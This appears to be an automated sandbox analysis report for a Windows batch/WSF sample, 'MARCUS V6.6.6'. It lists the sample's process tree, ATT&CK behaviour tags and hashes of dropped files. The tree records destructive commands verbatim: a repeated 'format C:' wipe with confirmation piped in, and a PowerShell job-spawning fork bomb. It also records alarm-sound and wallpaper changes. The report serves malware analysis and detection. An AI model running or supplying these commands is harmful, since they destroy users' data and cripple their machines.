C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4676
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:1600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5908
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:6084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2620
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2140
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2892
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5868
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:1972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5700
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:5004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3972
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3628
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2916
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4860
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"2⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f2⤵
- Sets desktop wallpaper using registry
PID:5852
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"2⤵PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f2⤵
- Sets desktop wallpaper using registry
PID:5996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:9396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [ 100% "2⤵PID:7720
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9392
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2068
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2624
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
280B
MD50524c92c95ae22d4f59e3a97b47744ff
SHA1b5bfc1a1bafe619b75255161b0a295956a28cf9e
SHA25661e7d262c220c13fc9aa6bc6d35af2e94cb43bee7de3b90840cb7a905769676c
SHA51274cb6174ba92659c9011afd13b0460753bfe499183d577097251fa8dbfda9a71796dc80d3a00b9933b42d3d6dd386725439d485b96d90e9783dc2c1c6ba315a5
-
Filesize
280B
MD550682d36ea29dc25028cb8219fc8a699
SHA1f986acb0971c6b7337f450510cab2cb6f74164e8
SHA256da7fcfc287a041747fbcd486e0e8791a5fb30c64e345e73918d41cee1f655484
SHA5125e582708ff6a5e6fd56da0a1d5448fbde1588f704178a8347880357c8b29a113cb0660dc22ed2702ba34a7be7d7d7ac37451c16f473d03ce8273025e35d9bcc8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
331B
MD5dd616b1ac33c823762bae6902222f878
SHA1cff9f27788f0442abb44ebf03a2c5c935caf7439
SHA256fbcf4df43de9eb727ed31ffa93c0fb0ccda804394e2090a3a982f67f8cc31994
SHA51263aaa9e6fad3270b997c0691d8acfc8595ca15b33a574a6773d5f53bb6b1c18d9b35bc4445c8f569b7e1c51be27f8c839be0f85601e3d3117553114d5a5bb4ea
-
Filesize
44KB
MD513b477494b9d13398def88761acf707d
SHA1b8ed7fd5dbe57cf75ba818b68eaccc4487f3024f
SHA256be46dd69fcf95cde897ff83ae92f388d52a4aec19c0056eee747b5984c4924ce
SHA512ad897cce1b48c83b9472c5f71fb03b308cf6082b8d42a6ef4dbdeb7df6a3d801153d5154c004b776dd3d59abe1c8df40cf666ceafbb72bb59b74bcc442104652
-
Filesize
520KB
MD53984094cc81f436705429ed63ebbfa3b
SHA159d9989298a826912387ccc6e6ce3f4d7e8d9a9f
SHA25646a8361584e71613d8a6a3f3e850458a09ce8fef4a35917fceb77d51ad80397b
SHA512e184dfceeba8b91181f1157b21237a0d7841b5a0de594d1017e9a62d114d819501770dbe0a520401689bdf60e7023822000d84744a6f3d5328daee27241ae79f
-
Filesize
1.0MB
MD567c31d3cd30537e69a765495ee0374ae
SHA1b4ab8e0c8632c8ee70d7feedc342e98c79017e6c
SHA256879525d0246352d78965eb76a9904cae571648f65973e9c62601bc2c46fdc426
SHA51230f386d835a14f19fd9e84b90f76b7cff74adf5f6311ccf1166afa399dc7f4e20708519a1aa44d957184af4ebcab6dcb5ee760324969ac2e105c80a2dba02481
-
Filesize
8.0MB
MD5e9122de20589855e9b8f3dd1f03fb6b2
SHA1309046468630758be927857fa4f7f1f05f8d265b
SHA256c98798142aef34e3e7b3d0cb863a598cc20660bbeb3d8771f0c32529ccfb7cee
SHA5120145adb36d96b96cf734d6d71900c14def03a5925eede53c854899500a91f3dba342aadc741228f8d611fdf2c3759a83a176eeaa7c6d2aed5617f7f49a8c8724
-
Filesize
5KB
MD5f62195fefaa65c5acfcf944cf3b76108
SHA16baed5a04e3419c9be4582b74a4480590e4a3ad6
SHA256d048490e60db3268bd04d75c3c4f8434fea474150fc1e987ae4f6cfd140143ab
SHA51246e89e42f8c918354e652499d3acc542f1a53bfdda3b6622845b40ad4f7cc07b1a2ee1363b2bac4453a01f69802fd3b37b448c09780b244515a5f400b8aa5bda
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD56961f0238adf896f44335ec3b85154cc
SHA1cca4fae83a557d557a5d88b1867608ac0662547e
SHA256622edd9eca35effa8f8e859401b1e14762038eb704fe8b5647366973fccd55c1
SHA51295def2b8dc34b4ce6343b30df594eba0fec989b0434b7d873dfd026869fa8d37a70cad76750360704d8eaf94fde00d2378939e0fcf29227fdc806e21c86bbb23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57d4d4.TMP
Filesize4KB
MD5a6ded319994831632738522e40f22561
SHA11d28a0c4dc71fbea02d87f8678504dccd25aea99
SHA2566354905e6cf9a5559aa69ec9d939d38f071bc3ae7d25ba3d0ef5c374682eb4d8
SHA512636120a3ad1b53e64477e7dedf163a2b58636b8174520f2bbd79d4bd1547cd4ee9cc3d97075aaafa9ec7858f3bb574e1caca463fe383862a6805633292c57b46
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
20KB
MD5d0eaa172f3bbf72652359b70b4ebf9f4
SHA1b00788054f525e931158ac78f0ada17d6789d8f6
SHA2565fae474698a5c75799e4f9f6e4a7fab926372d177904dbc4e4c4af4f036fc807
SHA512259b06dde9049b471b5e6b068fdd581e1b5fa757fec4a600fb5c7c933abed4f95dd0c5b941fd0dac7a30414c968297036c7eac1e92dec840ac07a701034f3624
-
Filesize
264KB
MD5b016a2a37b83156a43dc509712c9468a
SHA1a6ac6b50452acedffa2cb70936d4b6c19a1425a5
SHA256b3ef033b660d0a1a9344193497e8920d4a831d46ecfe73344bb8bea07ef94e64
SHA512121467315ac8d3b9dbf3495105fd69cb9b1c9c5b08e8d50c5fb6311afbee9d15b1b51cbb1b9329c0a211e5c088e942f70e990c08ccc0adb28eab9585e3c06fb8
-
Filesize
224KB
MD53cf3cbfee9d8cff26a4c0eca5bcf3be9
SHA190df1446ade1d5f937d04cce1ccc6e92392bd650
SHA2561f0281dca0fbbcc2466d26d6601e2e8d098bfb3a476aea61fd957a8a12630859
SHA5127654b0392ecc0ee7b2d3fa24d802b3a34139947ed6c746561cb0803ac9b6df9e6fecb2c0d18a0d5d3549921fe197663fb358537dea57fdf504b656622d675760
-
Filesize
108KB
MD506d55006c2dec078a94558b85ae01aef
SHA16a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60
-
Filesize
9KB
MD5daa96fdb1342d7a49a350ca72f29e629
